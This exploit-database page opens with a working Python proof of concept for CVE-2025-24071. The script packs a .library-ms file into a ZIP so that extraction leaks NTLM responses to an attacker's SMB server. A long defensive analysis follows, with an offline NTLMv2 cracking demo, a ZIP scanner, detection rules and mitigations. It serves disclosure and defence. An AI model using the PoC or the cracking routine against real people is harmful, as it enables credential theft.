Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure

Exploit Author: Mohammed Idrees Banyamer
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: Python
Published Date: 2025-05-29
#!/usr/bin/env python3
# Exploit Title: Windows File Explorer Windows 11 (23H2) - NTLM Hash Disclosure
# Exploit Author: Mohammed Idrees Banyamer
# Twitter/GitHub: https://github.com/mbanyamer
# Date: 2025-05-27
# CVE: CVE-2025-24071
# Vendor: Microsoft
# Affected Versions: Windows 10/11 (All supporting .library-ms and SMB)
# Tested on: Windows 11 (23H2)
# Type: Local / Remote (NTLM Leak)
# Platform: Windows
# Vulnerability Type: Information Disclosure
# Description:
#   Windows Explorer automatically initiates an SMB authentication request when a
#   .library-ms file is extracted from a ZIP archive. This causes NTLM credentials
#   (in hashed format) to be leaked to a remote SMB server controlled by the attacker.
#   No user interaction is required beyond extraction.

import zipfile
from pathlib import Path
import argparse
import re
import sys
from colorama import Fore, Style

def create_library_ms(ip: str, filename: str, output_dir: Path) -> Path:
    """Creates a malicious .library-ms file pointing to an attacker's SMB server."""
    payload = f'''<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\{ip}\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>'''
    
    # Name the library file after the -n/--name argument (the parameter was previously unused).
    output_file = output_dir / f"{filename}.library-ms"
    output_file.write_text(payload, encoding="utf-8")
    return output_file

def build_zip(library_file: Path, output_zip: Path):
    """Packages the .library-ms file into a ZIP archive."""
    with zipfile.ZipFile(output_zip, 'w', zipfile.ZIP_DEFLATED) as archive:
        archive.write(library_file, arcname=library_file.name)
    print(f"{Fore.GREEN}[+] Created ZIP: {output_zip}{Style.RESET_ALL}")

def is_valid_ip(ip: str) -> bool:
    """Accept only a dotted-quad IPv4 address with every octet in 0-255
    (the previous regex accepted values such as 999.999.999.999)."""
    parts = ip.split(".")
    return len(parts) == 4 and all(p.isdigit() and 0 <= int(p) <= 255 for p in parts)

def main():
    parser = argparse.ArgumentParser(
        description="CVE-2025-24071 - NTLM Hash Disclosure via .library-ms ZIP Archive",
        epilog="example:\n  python3 CVE-2025-24071_tool.py -i 192.168.1.100 -n payload1 -o ./output_folder --keep",
        formatter_class=argparse.RawTextHelpFormatter
    )

    parser.add_argument("-i", "--ip", required=True, help="Attacker SMB IP address (e.g., 192.168.1.100)")
    parser.add_argument("-n", "--name", default="malicious", help="Base filename (default: malicious)")
    parser.add_argument("-o", "--output", default="output", help="Output directory (default: ./output)")
    parser.add_argument("--keep", action="store_true", help="Keep .library-ms file after ZIP creation")

    args = parser.parse_args()

    if not is_valid_ip(args.ip):
        print(f"{Fore.RED}[!] Invalid IP address: {args.ip}{Style.RESET_ALL}")
        sys.exit(1)

    output_dir = Path(args.output)
    output_dir.mkdir(parents=True, exist_ok=True)

    print(f"{Fore.CYAN}[*] Generating malicious .library-ms file...{Style.RESET_ALL}")
    library_file = create_library_ms(args.ip, args.name, output_dir)
    zip_file = output_dir / f"{args.name}.zip"
    build_zip(library_file, zip_file)

    if not args.keep:
        library_file.unlink()
        print(f"{Fore.YELLOW}[-] Removed intermediate .library-ms file{Style.RESET_ALL}")

    print(f"{Fore.MAGENTA}[!] Done. Send ZIP to victim and listen for NTLM hash on your SMB server.{Style.RESET_ALL}")

if __name__ == "__main__":
    main()


Windows File Explorer (Windows 11 23H2) — NTLM Hash Disclosure (CVE-2025-24071)

Executive summary

CVE-2025-24071 describes an information-disclosure vulnerability in Windows File Explorer: extracting a specially crafted .library-ms file from a ZIP archive causes Explorer to resolve the UNC path embedded in the file and open an SMB connection to it. The SMB session setup sends the victim's NTLM challenge/response (the NTLMv2 response, commonly called the "NTLM hash") to whatever server owns that path, which can be an attacker-controlled host on the local network or on the Internet. The leak is triggered by the extraction itself, with no further user interaction, which makes it a high-impact local/remote credential-leak vector. Microsoft has assigned the CVE and published a security update; apply the vendor update as the primary remediation.

Background — what is a .library-ms and why this matters

.library-ms is an XML-based file format used by Windows Libraries to describe the folders a library aggregates and the search connectors it uses. When Explorer processes a .library-ms, it resolves the locations the file declares, in particular the <url> element inside <simpleLocation> (the element the PoC above populates). If that URL is a UNC path (\\server\share), Explorer contacts the remote host to enumerate the location, which triggers SMB negotiation and NTLM authentication from the victim host to whatever server answers at that name or address.

What leaves the host is not the account's NT hash but the NTLMv2 challenge/response: an HMAC-MD5, keyed with a value derived from the NT hash, over the server's challenge and a client blob. It cannot be replayed as a pass-the-hash credential, but it can be cracked offline (each guess costs one HMAC, so weak passwords fall quickly) or relayed in real time to another service that accepts NTLM and does not enforce signing. Even when the goal is not immediate account takeover, a captured response hands the attacker the user name, the domain and a cracking target, a valuable foothold for lateral movement and privilege escalation.
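To make the previous paragraph concrete, here is an added example written for this page (not code from the advisory or from the PoC author). It computes the NTLMv2 response the way a Windows client does, formats it the way an attacker's SMB listener records it, and then recovers the password by the same offline recomputation a cracker performs. The user name, domain, password, server challenge and client blob are constructed sample values; the pure-Python MD4 is included because hashlib's MD4 is often disabled under OpenSSL 3.

```python
import hmac
import struct
from typing import Iterable, Optional

# Added example for this page (not the advisory's or PoC author's code).
# All credential values below are constructed for the demonstration.

MASK32 = 0xFFFFFFFF


def _lrot(x: int, n: int) -> int:
    x &= MASK32
    return ((x << n) | (x >> (32 - n))) & MASK32


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320). hashlib's md4 is often unavailable under OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, list(range(16)), (3, 7, 11, 19), 0),
        (g, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999),
        (h, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        w = state[:]
        for fn, order, shifts, k in rounds:
            for i, idx in enumerate(order):
                r = (-i) % 4  # register updated this step cycles a, d, c, b
                w[r] = _lrot(w[r] + fn(w[(r + 1) % 4], w[(r + 2) % 4], w[(r + 3) % 4]) + x[idx] + k, shifts[i % 4])
        state = [(s + t) & MASK32 for s, t in zip(state, w)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password. This value never leaves the client."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain in UTF-16LE (MS-NLMP 3.3.2)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), "md5").digest()


def nt_proof_str(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """The 16 bytes actually sent in AUTHENTICATE_MESSAGE: HMAC-MD5(NTOWFv2, challenge || blob)."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, "md5").digest()


def format_capture(user: str, domain: str, server_challenge: bytes, proof: bytes, blob: bytes) -> str:
    """Net-NTLMv2 line in the layout Responder prints and hashcat mode 5600 consumes."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_capture(capture: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline attack: recompute NTProofStr for each candidate password and compare."""
    user, _, domain, chal_hex, proof_hex, blob_hex = capture.split(":")
    chal, proof, blob = bytes.fromhex(chal_hex), bytes.fromhex(proof_hex), bytes.fromhex(blob_hex)
    for pw in candidates:
        if hmac.compare_digest(nt_proof_str(pw, user, domain, chal, blob), proof):
            return pw
    return None


def demo_capture() -> str:
    """Constructed capture for user alice in domain CORP, as a rogue SMB server would log it."""
    server_challenge = bytes.fromhex("0123456789abcdef")  # constructed
    blob = (bytes.fromhex("0101000000000000")             # RespType, HiRespType, reserved
            + b"\x00" * 8                                  # timestamp (zeroed for the demo)
            + bytes.fromhex("aaaaaaaaaaaaaaaa")            # client challenge (constructed)
            + b"\x00" * 12)                                # Reserved3, MsvAvEOL terminator, Reserved4
    proof = nt_proof_str("Winter2024!", "alice", "CORP", server_challenge, blob)
    return format_capture("alice", "CORP", server_challenge, proof, blob)


if __name__ == "__main__":
    line = demo_capture()
    print("captured:", line)
    print("cracked :", crack_capture(line, ["password", "Summer2023!", "Winter2024!"]))
```

The point of the walk-through: the capture contains the server challenge and the client blob in the clear, so anyone holding the line can recompute the HMAC for candidate passwords at cracking speed, while the NT hash itself is never transmitted and cannot be extracted from the capture without a correct guess.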

Affected systems and impact

  • Reported CVE: CVE-2025-24071
  • Affected: Windows 10/11 builds that parse .library-ms and perform network resolution in Explorer (details depend on patched builds; refer to Microsoft advisory for exact versions)
  • Impact: Information disclosure of NTLM hashed authentication material. Enables offline cracking, relay attacks, or other credential-based abuses.
  • Attack vector: Victim extracts a ZIP containing a crafted .library-ms (no further interaction required).

High-level attack flow (non-actionable)

  • Attacker embeds a .library-ms file referencing a remote UNC path in a ZIP.
  • Victim extracts the ZIP with Windows Explorer; Explorer parses the .library-ms.
  • Explorer resolves the UNC location and initiates an SMB connection to the remote host.
  • NTLM negotiation occurs and the client transmits authentication material to the remote server.
  • Attacker captures the NTLM hashes and can attempt to exploit them (offline cracking, relaying, etc.).
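A defensive check for the archive described in the flow above, as an added example that is not part of the original PoC or analysis: it opens a ZIP in memory, parses every .library-ms entry and reports any <url> that is a UNC path to a host outside an allowlist. The allowlist entry, the entry names and the sample archive it builds are constructed for the demonstration; the same logic is what a mail gateway or a pre-extraction hook would run.

```python
import io
import xml.etree.ElementTree as ET  # use defusedxml.ElementTree in production (entity expansion)
import zipfile
from typing import Dict, List

# Added example for this page (not the PoC's or analysis author's code).
# The allowlist and the sample archive are constructed placeholders.

LIBRARY_NS = "{http://schemas.microsoft.com/windows/2009/library}"
ALLOWED_SMB_HOSTS = {"fileserver01.corp.example"}  # placeholder allowlist (assumption)


def unc_hosts_in_library(xml_bytes: bytes) -> List[str]:
    """Return the host of every <url> in a .library-ms document that is a UNC path."""
    hosts = []
    for el in ET.fromstring(xml_bytes).iter():
        if el.tag not in (LIBRARY_NS + "url", "url") or not el.text:
            continue
        # Normalise forward slashes, which Windows also accepts in UNC paths.
        url = el.text.strip().replace("/", "\\")
        if url.startswith("\\\\"):
            hosts.append(url[2:].split("\\", 1)[0].lower())
    return hosts


def scan_zip(zip_bytes: bytes) -> List[Dict[str, str]]:
    """Flag every .library-ms entry whose UNC target is not an approved file server."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                hosts = unc_hosts_in_library(zf.read(info))
            except ET.ParseError:
                # Explorer may still try to parse a broken file; treat it as suspicious too.
                findings.append({"entry": info.filename, "host": "", "reason": "malformed .library-ms"})
                continue
            for host in hosts:
                if host not in ALLOWED_SMB_HOSTS:
                    findings.append({"entry": info.filename, "host": host, "reason": "UNC to non-allowlisted host"})
    return findings


def build_sample_zip(host: str) -> bytes:
    """Constructed test archive in the shape the PoC produces (built here for the demo)."""
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">'
        "<searchConnectorDescriptionList><searchConnectorDescription><simpleLocation>"
        f"<url>\\\\{host}\\shared</url>"
        "</simpleLocation></searchConnectorDescription></searchConnectorDescriptionList>"
        "</libraryDescription>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice_2025.library-ms", xml)
        zf.writestr("readme.txt", "harmless text")
    return buf.getvalue()


if __name__ == "__main__":
    for target in ("203.0.113.10", "fileserver01.corp.example"):
        print(target, "->", scan_zip(build_sample_zip(target)))
```

Matching the entry by extension is deliberate: Explorer keys on the .library-ms suffix, so a renamed file would not trigger the behaviour, while any .library-ms entry, even one nested several folders deep in the archive, would.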

Detection guidance

Detecting exploitation attempts requires both network and endpoint telemetry. Key signals to look for:

  • Unexpected outbound SMB connections (TCP 445, and 139 for legacy NetBIOS) from workstations to Internet addresses or to internal hosts that are not file servers or domain controllers. Windows Filtering Platform auditing (Event ID 5156, when connection auditing is enabled) records each permitted connection with the owning process.
  • On the victim, NTLM auditing: enable "Network security: Restrict NTLM: Audit outgoing NTLM traffic to remote servers" and watch Event ID 8001 in the Microsoft-Windows-NTLM/Operational log, which names the target server and the account whose credentials were offered. Security log Event ID 4624 (Logon Type 3) is written on the server that receives the authentication, not on the client that leaked it, so it does not appear on the victim for the leak itself.
  • Event ID 4776 (NTLM credential validation) is logged on the domain controller (or on a standalone server validating a local account). It does not fire for the leak to a rogue server, but it does if the captured response is relayed to a domain-joined target, so a 4776 for a user whose workstation just made an unusual outbound SMB connection is a strong correlation signal.
  • Endpoint telemetry (Sysmon Event ID 3) showing an outbound connection to TCP 445/139. The SMB client runs in the kernel redirector, so Sysmon attributes the connection to the System process (PID 4), not to explorer.exe; key on destination address and port, and correlate with a preceding Sysmon Event ID 11 (file create) of a .library-ms by explorer.exe or the archive tool.
  • Network IDS/IPS alerts for SMB negotiation attempts to unknown destinations, or SMB session setups originating from user endpoints.

Example detection rule (Sigma-style, defensive)


title: Outbound SMB Connection From Endpoint
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    Initiated: 'true'
    DestinationPort:
      - 445
      - 139
  condition: selection
level: high
description: Detect a Windows host initiating an outbound SMB connection (may indicate .library-ms resolution to a remote UNC path); add a filter for approved file servers before deploying

Explanation: this Sigma rule keys on direction and destination port rather than on the process image. In Sysmon Event ID 3 (and in WFP Event ID 5156) the SMB client connection is attributed to the System process (PID 4), because the SMB redirector runs in the kernel; a rule that matches Image explorer.exe on port 445 would therefore never fire, whatever Explorer did to trigger the connection. As written the rule is noisy, since every SYSVOL and file-server access matches: add a filter selection for the approved file-server and domain-controller addresses (DestinationIp with the cidr modifier) and make the condition "selection and not filter" before deploying. To tie a hit back to extraction, correlate with a Sysmon Event ID 11 (file create) for a .library-ms in the preceding seconds on the same host.
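The rule expressed as executable logic, run over constructed Sysmon Event ID 3 records in the JSON shape a Sysmon-to-SIEM pipeline typically emits. This is an added example for this page, not code from the advisory; the approved file-server range is a placeholder. The sample records show the attribution caveat directly: the SMB connections carry Image "System", and the only explorer.exe record is an HTTPS connection.

```python
import ipaddress
import json
from typing import Dict, List

# Added example for this page (not from the advisory). Sample events are constructed.

SMB_PORTS = {445, 139}
APPROVED_SMB_RANGES = [ipaddress.ip_network("10.10.20.0/24")]  # placeholder: file servers / DCs (assumption)


def is_suspicious_smb(event: Dict) -> bool:
    """An endpoint initiated a TCP 445/139 connection to something other than an approved server."""
    if event.get("EventID") != 3 or str(event.get("Initiated", "")).lower() != "true":
        return False
    if int(event.get("DestinationPort", 0)) not in SMB_PORTS:
        return False
    try:
        dst = ipaddress.ip_address(event["DestinationIp"])
    except (KeyError, ValueError):
        return True  # unparsable destination: surface it rather than silently drop it
    if dst.is_loopback:
        return False
    return not any(dst in net for net in APPROVED_SMB_RANGES)


def run_detection(lines: List[str]) -> List[Dict[str, str]]:
    """Apply the rule to newline-delimited JSON events and return the hits."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        if is_suspicious_smb(ev):
            hits.append({"host": ev.get("Computer", ""), "image": ev.get("Image", ""),
                         "dst": f"{ev.get('DestinationIp')}:{ev.get('DestinationPort')}"})
    return hits


# Constructed sample events. The SMB connections are attributed to "System" (PID 4)
# because the redirector runs in the kernel; a rule keyed on explorer.exe sees nothing.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 3, "Computer": "WS-042", "Image": "System", "ProcessId": 4, "Protocol": "tcp",
                "Initiated": "true", "DestinationIp": "10.10.20.5", "DestinationPort": 445}),     # approved server
    json.dumps({"EventID": 3, "Computer": "WS-042", "Image": "System", "ProcessId": 4, "Protocol": "tcp",
                "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 445}),   # Internet host: hit
    json.dumps({"EventID": 3, "Computer": "WS-042", "Image": "C:\\Windows\\explorer.exe", "Protocol": "tcp",
                "Initiated": "true", "DestinationIp": "203.0.113.10", "DestinationPort": 443}),   # HTTPS, not SMB
    json.dumps({"EventID": 3, "Computer": "WS-042", "Image": "System", "ProcessId": 4, "Protocol": "tcp",
                "Initiated": "false", "DestinationIp": "203.0.113.10", "DestinationPort": 445}),  # inbound, ignored
]


if __name__ == "__main__":
    for hit in run_detection(SAMPLE_EVENTS):
        print(hit)
```

The allowlist is the tuning knob: the rule only stays useful if the approved ranges cover every legitimate SMB target (file servers, DCs, print servers), otherwise the alerts drown in SYSVOL traffic.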

Mitigation and hardening

Prioritize installing Microsoft’s security update for CVE-2025-24071. Additional mitigations reduce exposure and limit credential leakage risk.

  • Apply vendor patches immediately: Follow Microsoft’s advisory and deploy the supplied updates across endpoints and servers.
  • Block SMB egress: Prevent workstations from making SMB connections to the broader network or Internet. Implement egress firewall rules to block TCP ports 445 and 139 for non-authorized hosts.
  • Restrict NTLM usage: set "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Audit all first, review the Event ID 8001 entries it produces, then move to Deny all with exceptions ("Add remote server exceptions for NTLM authentication") only for servers that genuinely need NTLM. Require SMB signing (and LDAP signing/channel binding) on servers so a captured response cannot be relayed; signing stops relay but not offline cracking, so it complements rather than replaces the NTLM restriction.
  • Email / attachment controls: Disallow or sandbox archives from untrusted senders; use content-disarm/inspection or block suspicious archive types in mail gateways.
  • EDR / AV tuning: Mark .library-ms extraction or creation as suspicious in endpoint controls so quarantine policies trigger on unexpected library file operations from user contexts.
  • Least privilege: Ensure user accounts are not local admins where unnecessary — reduced privilege limits lateral movement if hashes are abused.

Practical defensive commands (examples)

Below are defensive commands you can run as an administrator to help detect or block outbound SMB from Windows hosts. These are precautions and do not demonstrate exploit construction.


# Example: Create a Windows Firewall rule to block outbound SMB (TCP 445 and 139)
New-NetFirewallRule -DisplayName "Block Outbound SMB (Egress)" `
  -Direction Outbound -Action Block -Protocol TCP `
  -RemotePort 445,139 -Profile Any -Enabled True

Explanation: this PowerShell command creates a local firewall rule that blocks all outbound TCP 445/139, which also cuts off domain file shares, SYSVOL/NETLOGON and therefore Group Policy processing. Before deploying it broadly, scope the rule: either list the external ranges to block in -RemoteAddress, or start with -Profile Public so it applies only when the machine is off the corporate network, and enforce internal SMB egress at the boundary firewall. Deploy centrally via Group Policy or endpoint management for broad coverage.


# Example: Query installed updates (quick check for presence of security hotfixes)
Get-HotFix | Where-Object { $_.Description -match "Security" } |
  Sort-Object InstalledOn -Descending | Select-Object HotFixID, Description, InstalledOn

Explanation: this snippet lists installed security updates, newest first (the original filter also matched on HotFixID containing "KB", which is true of every entry, so it filtered nothing). Get-HotFix only reports what the servicing stack registered; to confirm the fix for CVE-2025-24071, take the KB number for your build from the Microsoft advisory and query it directly with Get-HotFix -Id KB<number>, or rely on your patch-management system or the Microsoft Update Catalog.

Incident response checklist

  • Isolate suspected hosts from network egress while preserving forensic data.
  • Collect Windows event logs (Security, System, Application), Sysmon logs, and firewall logs for the timeframe of the suspected extraction.
  • Capture a network packet trace (if still available) to look for SMB negotiation and NTLM challenge/response.
  • Search SIEM for explorer.exe or user hosts making SMB connections to unusual external addresses around the time of the event.
  • Reset or rotate credentials for accounts implicated in captured NTLM hashes and review for unauthorized access attempts.
  • Apply vendor patch across the environment and document remediation steps.

Risk reduction — longer term controls

  • Egress filtering across network boundaries to prevent endpoints talking directly to the Internet over SMB.
  • Network segmentation: separate user workstations from servers that require SMB access, with controlled and monitored jump hosts where required.
  • Enforce modern authentication where possible (Kerberos / certificate-based) and reduce NTLM dependencies.
  • Deploy comprehensive endpoint telemetry (Sysmon, EDR) and centralized log collection so anomalous SMB activity is detected quickly.

Responsible disclosure and vendor guidance

If you discover instances of this vulnerability in the wild, follow your organization’s incident response process and report discoveries to Microsoft via their security response channels if not already handled. Always prioritize patching from Microsoft as the definitive fix. Do not attempt to weaponize the vulnerability in testing outside a controlled lab environment.

Summary

CVE-2025-24071 is an important information-disclosure issue because it can cause NTLM authentication material to be sent to attacker-controlled SMB endpoints with minimal user interaction. The primary actions are: apply the Microsoft update, block SMB egress where appropriate, strengthen NTLM-related policies, and improve detection coverage for explorer.exe or workstation-originated SMB connections. Combining immediate mitigations with long-term hardening (egress filtering, disabling NTLM where possible, SMB signing) will substantially reduce exposure to similar credential-leak threats.